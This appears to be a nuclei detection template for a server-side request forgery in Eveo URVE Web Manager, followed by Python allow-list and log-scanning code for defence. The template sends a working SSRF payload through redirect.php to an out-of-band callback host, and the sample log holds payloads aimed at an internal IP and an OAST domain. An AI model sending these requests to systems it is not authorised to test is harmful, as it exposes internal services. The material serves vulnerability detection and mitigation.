id: CVE-2025-36845

info:
  name: Eveo URVE Web Manager - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: high
  description: |
    Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of the URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints. Exploitation requires crafted URL input.
  impact: |
    Attackers can make requests to internal-only accessible endpoints, potentially exposing sensitive internal services or data.
  remediation: |
    Update to the latest version with SSRF protections or apply input validation to restrict URL requests.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
    - https://smartoffice.expert/en
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"URVE Web Manager"
  tags: cve,cve2025,eveo,ssrf,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/urve/site/login.html?lang=en"

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'URVE Web Manager')"
          - "status_code == 200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/_internal/redirect.php?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100e8485b0f6e12dfd30ac43130dd20d7059168912b2c8db99550e2d11f32affcfa022100e6d23f89bb6bd11e0a804607ad7b8e2f0048044b1edd544ad3bdc8b9b3311ace:922c64590222798bb761d5b6d8e72950
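The remediation above asks for input validation on the redirect target; the following added Python example (not part of the nuclei template, the SySS advisory, or the vendor's code) shows an allow-list check of the kind a defender would put in front of such an endpoint, and applies the same check to constructed access-log lines to flag redirect.php requests whose url= value points anywhere other than an approved host. The allow-list, log lines, client addresses and the oast.example host are all constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list: the only hosts the redirect may send a browser to.
ALLOWED_REDIRECT_HOSTS = {"smartoffice.expert", "www.smartoffice.expert"}

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2025:09:14:02 +0000] "GET /urve/site/login.html?lang=en HTTP/1.1" 200 5120
10.0.0.5 - - [10/Mar/2025:09:14:07 +0000] "GET /_internal/redirect.php?url=https%3A%2F%2Fsmartoffice.expert%2Fen HTTP/1.1" 302 0
203.0.113.9 - - [10/Mar/2025:09:15:31 +0000] "GET /_internal/redirect.php?url=http%3A%2F%2F10.0.0.12%2F HTTP/1.1" 200 812
203.0.113.9 - - [10/Mar/2025:09:15:40 +0000] "GET /_internal/redirect.php?url=http%3A%2F%2Fabc123.oast.example%2F HTTP/1.1" 200 0
"""

LOG_RE = re.compile(r'"GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def redirect_target_is_safe(target: str) -> bool:
    """Allow-list check for a redirect target: only http(s), only a known
    host name, never a literal IP address (so 'user@10.0.0.12' tricks and
    private/loopback addresses are refused without a block-list)."""
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()  # urlsplit strips any userinfo for us
    try:
        ipaddress.ip_address(host)
        return False  # any literal IP, public or private, is refused
    except ValueError:
        pass
    return host in ALLOWED_REDIRECT_HOSTS


def find_suspicious_redirects(log_text: str) -> list[dict]:
    """One finding per redirect.php request whose url= value fails the allow-list."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        req = urlsplit(m.group("path"))
        if req.path != "/_internal/redirect.php":
            continue
        for target in parse_qs(req.query).get("url", []):  # parse_qs URL-decodes
            if not redirect_target_is_safe(target):
                findings.append({"client": line.split()[0], "target": target,
                                 "status": int(m.group("status"))})
    return findings
```

Run against a real log, a non-empty result from `find_suspicious_redirects` is the triage list; the same `redirect_target_is_safe` logic, ported to the endpoint itself, is the mitigation.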